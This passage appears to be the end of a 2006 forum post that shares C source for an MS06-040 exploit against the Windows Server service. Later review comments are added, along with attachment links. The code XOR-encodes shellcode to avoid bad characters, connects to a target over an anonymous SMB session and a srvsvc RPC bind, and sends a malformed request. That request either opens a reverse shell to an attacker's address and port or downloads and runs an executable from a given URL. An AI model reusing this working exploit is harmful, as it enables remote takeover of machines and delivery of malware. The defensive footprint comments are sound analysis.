      // longer than roughly 1024 - sizeof(shellcodenew) bytes writes past sc.
      // The 16-bit store of Sc_len is an unaligned type-punned write (fine for
      // x86/MSVC, not portable) and truncates anything above 0xFFFF. `length` is
      // unused. exit(-1) returns without closing the pipe handle opened in main().
      void makecode(char *url)
      {

      int length=0;
      unsigned int Enc_key=ENC_KEY;
      unsigned int i,j,l;
      Sc_len = sizeof(shellcodenew)+strlen(url)+2;
      ZeroMemory(sc,1024);
      memcpy(sc,shellcodenew,sizeof(shellcodenew));
      memcpy(sc+sizeof(shellcodenew)-1,url,strlen(url));  // URL starts where the literal's NUL was

      for(i=0xff; i>0; i--)
      {
      l = 0;  // l != 0 means key i produces at least one bad byte
      for(j=DECODE_LEN; j<Sc_len; j++)
      {
      if (
      ((sc[j] ^ i) == 0x26) || //& (the original comment said %, but 0x26 is '&')
      ((sc[j] ^ i) == 0x3d) || //=
      ((sc[j] ^ i) == 0x3f) || //?
      ((sc[j] ^ i) == 0x40) || //@
      ((sc[j] ^ i) == 0x00) ||
      ((sc[j] ^ i) == 0x0D) ||
      ((sc[j] ^ i) == 0x0A) ||
      ((sc[j] ^ i) == 0x5c) ||
      ((sc[j] ^ i) == 0x5f) ||
      ((sc[j] ^ i) == 0x2e) ||
      ((sc[j] ^ i) == 0x2f)
      ) // Define Bad Characters
      {
      l++; // this key would produce a bad byte — reject it and try the next key
      break;
      };
      }

      if (l==0)
      {
      Enc_key = i;

      printf("[+] Find XOR Byte: 0x%02X\n", i);
      for(j=DECODE_LEN; j<Sc_len; j++)
      {
      sc[j] ^= Enc_key;  // encode everything after the decoder stub
      }

      break; // If found the right XOR byte, Break
      }
      }

      // If the loop ran to completion, the last iteration (i == 1) left l != 0.
      if (l!=0)
      {
      printf("[-] No xor byte found!\r\n");
      exit(-1);
      }

      // Patch length and key into the decoder stub (unaligned 16-bit store).
      *(unsigned short *)&sc[SC_LEN_OFFSET] = Sc_len;
      *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;

      }


      // Entry point. argv[1] is the target host. With argc==5, argv[2..4] are the
      // reverse address, listener port and OS type; otherwise argv[2] is the
      // download URL and argv[3] the OS type (1 = Windows 2000 SP4, 2 = XP SP1 per
      // the usage text). Connects to \\host\pipe with empty user name and password
      // (an anonymous/null-session connection, as far as the call shows), opens the
      // BROWSER named pipe, binds the srvsvc interface
      // (4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0) and hands the handle to Attack().
      // For defenders: the footprint is a null-session SMB connect, an open of
      // \pipe\BROWSER, a DCE/RPC bind to srvsvc and a request with opnum 31.
      // NOTE(review): WNetAddConnection2() and CreateFile() results are unchecked,
      // so an INVALID_HANDLE_VALUE goes straight into BindRpcInterface()/Attack();
      // unc is NUL-terminated by hand after _snprintf() but szPipe is not; argc > 5
      // falls into the download branch; the remaining NETRESOURCE members of nr are
      // left uninitialised; hFile is never closed and the connection never cancelled.
      // The "[email]"/"[url]" tokens in the usage strings look like forum markup that
      // leaked into the literals (the quoted output above this listing lacks them).
      int main(int argc, char* argv[])
      {
      char *server;
      NETRESOURCE nr;
      char unc[MAX_PATH];
      char szPipe[MAX_PATH];
      HANDLE hFile;

      if (argc<4)
      {
      printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n");
      printf("\t\t rewritten by [email]superlone@[/email]\n");
      printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n");
      printf("Usage: %s <host> <download url> <os type>\n\n", argv[0]);
      printf("\t%s <host> <reverse addr> <revser port> <os type>\n\n",argv[0]);
      printf(" <download url>:\n\t\tsuch as:[url]http://192.168.0.128/test.exe[/url]\n\n");
      printf("<reverse addr>:\n\t\tyour host ip address\n\n");
      printf("<reverse port>:\n\t\tyour host listenning port\n\n");
      printf("<os type(1/2)>:\n\t\t 1: win 2000sp4 2:win xpsp1\n\n");
      printf("^_^Mika is telling you:don‘t play with fire!\n");
      return 1;
      }
      server=argv[1];
      _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
      unc[sizeof(unc)-1] = 0;  // _snprintf() does not guarantee termination on truncation
      nr.dwType = RESOURCETYPE_ANY;
      nr.lpLocalName = NULL;
      nr.lpRemoteName = unc;
      nr.lpProvider = NULL;
      WNetAddConnection2(&nr, "", "", 0);  // empty password and user name; result ignored

      _snprintf(szPipe, sizeof(szPipe),
      "\\\\%s\\pipe\\BROWSER",server);  // NOTE(review): not terminated by hand like unc
      hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
      OPEN_EXISTING, 0, NULL);  // INVALID_HANDLE_VALUE is not checked

      BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");  // srvsvc v3.0
      if (argc==5)
      {
         Attack(hFile,argv[2],atoi(argv[4]),atoi(argv[3]),1);  // reverse mode: addr, os type, port
      }
      else
      {
      //SendMalformed RPC request
      Attack(hFile,argv[2],atoi(argv[3]),0,0);  // download mode: url, os type
      }
      return 0;
      }



      再次感謝macro哥哥的無私共享,不然俺要寫出這么個程序來還得很長的路要走!


      [ 此貼被mika在2006-09-04 16:57重新編輯 ]



      附件: ms06040rpc.rar (17 K) 下載次數:1239

      附件:
      ms06040.rar (16 K) 下載次數:119
